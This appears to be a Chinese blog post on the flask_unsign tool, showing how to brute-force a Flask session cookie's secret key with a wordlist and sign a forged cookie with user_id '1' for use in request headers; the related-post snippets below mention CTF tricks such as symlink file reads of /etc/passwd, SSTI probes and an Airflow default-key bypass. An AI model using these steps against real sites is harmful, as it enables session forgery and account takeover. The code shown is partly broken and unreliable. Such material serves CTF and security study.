python 中的 flask_unsign 模块如何使用?

原创 已于 2023-11-09 09:07:57 修改 · 1.8k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #后端 #web安全

于 2023-02-13 15:54:14 首次发布
文章介绍了flask_unsign模块的功能,它用于字典爆破加密的web交互cookie。通过示例展示了如何使用模块生成Cracker对象进行爆破,找出加密cookie的私钥,并利用私钥创建新的cookie。此外,还提供了包含新cookie的HTTP头信息示例。
部署运行你感兴趣的模型镜像

作者:破符

模块的作用

有些web交互中的cookie是加密的,flask_unsign 模块的作用是字典爆破加密cookie的密钥。

模块下载

python -m pip install flask_unsign

python -m pip install flask_unsign_wordlist

模块使用

爆破cookie生成私钥
from flask_unsign import Cracker
from flask_unsign import logger,DEFAULT_WORDLIST

crack = Cracker(value=cookie,salt=DEFAULT_SALT,threads=8)
with wordlist (DEFAULT_WORDLIST) as iterator:
                    crack.crack(iterator)
        if crack.secret:
            logger.success(f'Found secret key after {crack.attempts} attempts')
            session1 = ascii(crack.secret)		#如果session1有结果,则该值为爆破出来的私钥
利用爆破出来的私钥生成新的cookie
from flask_unsign import session

sec_session = session.sign(value="{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}",secret= session1,)		#secret若无特殊要求,值应为爆破cookie生成的session1

#sec_session值为cookie可添加入header头部

顺便提供一下交互用的头部,注意sec_session为新生成的cookie

{
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36',
            "Cookie" : "session="+sec_session
}

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

毛伯星
关注
2021-DASCTF八月挑战赛
Yasso的博客
09-01 1745
babypython[国赛总决赛复现] 是个上传界面,经测试只能上传zip文件 看到页面提示,猜测只有admin才能得到flag,需要伪造session,伪造session要用到一个工具-flask-unsign 所以这道题关键是需要找到key. 可以上传zip文件,同时后台自动解压的情况下,从而实现任意文件读取。 软连接导致任意文件读取 我们可以压缩一个软链接,类似于windows下的快捷方式,然后网站后台会解压读取该软链接指向的服务器上的文件,就能达到读取任意文件的效果。 ln -s /etc/pas
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过(2)
2401_84009597的博客
04-20 1130
V操作码是可以识别\u (unicode编码绕过)无R,i,o os 可过 + 关键词过滤。特别是命令有特殊功能字符。无R,i,o os可过。
Web 框架安全:从 Flask 到 Django 的 CTF 常见漏洞
最新发布
m0_57836225的博客
07-11 1113
指纹识别:用whatweb或浏览器插件判断框架及版本。信息收集:访问错误页面、robots.txt.env等,寻找泄露点。漏洞测试Flask:测试 SSTI({{7*7}}看是否输出 49)、Session 伪造。Django:检查 DEBUG 模式、测试 ORM 注入点。PHP/Node.js:测试历史漏洞、eval注入。利用与验证:构造 payload,结合工具(如)获取 flag。
Python库 | flask_unsign_wordlist-0.0.5-py2.py3-none-any.whl
03-19
python库,解压后可用。 资源全名:flask_unsign_wordlist-0.0.5-py2.py3-none-any.whl
flask、session、cookie解加密脚本
10-13
flask、session、cookie解加密脚本
Flask-Unsign安装与使用指南
gitblog_00997的博客
08-22 1483
Flask-Unsign安装与使用指南 项目概述 Flask-Unsign 是一个基于 PythonFlask 框架扩展,专注于提供安全的会话管理解决方案,特别是通过未签名的 cookie 来增强安全性。此项目允许开发者以非加密但混淆的方式存储会话数据,适用于对隐私要求较严格的场景。 1. 项目目录结构及介绍 以下是 Flask-Unsign 的基本目录结构及其简要说明: Flask-Uns...
探索 Flask-Unsign安全高效地管理你的签名URL
gitblog_00050的博客
04-26 704
探索 Flask-Unsign安全高效地管理你的签名URL 是一个基于 PythonFlask 扩展,旨在为开发者提供一种简单而安全的方式来创建和验证时效性的、一次性使用的签名 URL。在 Web 开发中,这种功能常见于文件下载、限时访问等内容的保护。 项目简介 Flask-Unsign 提供了一套 API,能够方便地将私钥与 URL 结合,生成一个只能在指定时间内有效,并且只允许被使用一...
flask_unsign_wordlist库使用教程及特性解析
总结:给定文件涉及的知识点包括Flask框架的基础使用Python编程语言的核心特性和应用、后端开发的基本概念、Python库的安装和使用方法、轮子文件(Whl)的格式和作用以及可能涉及安全方面的`flask_unsign_wordlist...
flask-unsign
08-10
- *1* [python 中的 flask_unsign 模块如何使用?](https://blog.youkuaiyun.com/Java_Dad/article/details/129010630)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
【无标题】
weixin_52230368的博客
08-10 863
​ 对于伪随机数,当seed固定时,生成的随机数是可以预测的,也就是顺序为固定的,所以只要知道seed的值即可。获取硬件的地址并以48位二进制长度的正整数形式返回,这里所说的硬件地址是指网络接口的MAC地址,如果一个机器有多个网络接口,可能返回其中的任一个。:file://机器的IP地址/目录/文件,例如要打开D盘images文件夹中的111.png文件,那么可以在资源管理器或IE地址栏中键入file://D:/images/111.png 然后回车。关于这题以及知识点的总结,可能有点乱(狗头)。
Flask用户密码的加密和解密
qq_44906497的博客
09-18 838
在models.py中,写入如下代码。
python Flask 02 Flask 中内置的 Session
一越王超的博客
04-03 641
Flask中的Session非常的奇怪,他会将你的SessionID存放在客户端的Cookie中,使用起来也非常的奇怪。 1. Flask 中 session 是需要 secret_key 的 from flask import session app = Flask(__name__) app.secret_key = "DragonFire" secret_key 实际上是用来加密字符...
flask的安装与入门使用
changfcqxhy的博客
07-02 762
一、flask的安装 flask项目一般使用虚拟环境virtualenv运行,当然也可以直接在全局环境中使用 virtualenv的安装使用可以参考https://blog.youkuaiyun.com/changfcqxhy/article/details/90611331 安装 进入虚拟环境,输入指令 pip install Flask 等待安装完成即可 二、flask入门 参考文档 http://do...
通过SECRET_KEY绕过flask的session认证
笑笑生的博客
07-24 5970
转载:https://www.secpulse.com/archives/97707.html 前言 最近读到一篇英文文章,甚是有趣,所以想把关键内容提取并翻译出来,记录自己学习的同时也方便他人阅读,原文地址。 0x00 漏洞细节 一般来说,安全的session存储,客户端的cookie应该是不可读的,但flask的cookie却不完全是这样,这里直接贴原作者的图。 通过.隔开的3段内容,第一段其实就是base64 encode后的内容,但去掉了填充用的等号,若decode失败,自己需..
LitCTF-2023-web部分
m0_74097148的博客
05-18 2296
也有多种解法,当然如果上传有黑名单限制 但是远程下载没有 则可以用远程下载去下载PHP木马文件,然后剩余的步骤和上传木马的操作一样 不多做说明。并且题目提示我们只有username, password两列, 不需要group by去判断列数了。输入如下图的内容, 下载后点击编辑文件即可看到flag。如果想要了解更多关于http头部的信息可以参考。
flask 学习一
weixin_42262889的博客
04-27 171
from flask import Flask # imorted the Flask class. An instance of this class will be our WSGI application. app = Flask(__name__) # we create an instance of this class. The first argument is the name ...
[flask]cookie的基本使用/
jojojojoi的博客
03-25 898
在处理的过程中,cookie会在服务器端生成,在服务器端处理完成后,随着http响应,在响应头中加上cookie信息 浏览器接受到响应后,会按照http响应头的cookie在客户端建立cookie ,在下次客户进行请求的时候,http会附带已经存的cookie 一并发送到服务器。比如我们在网站将一个东西加入购物车,接着关掉浏览器,再打开,购物车的东西还在,那就是添加购物的这个信息被存在了一个地方,存在了该浏览器的缓存中。cookie是当你浏览某个网站的时候,由web服务器存储在你的机器硬盘上的一个小的。
Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)
weixin_45910629的博客
01-03 630
Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定webserver.authenticate=True来开启认证。在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值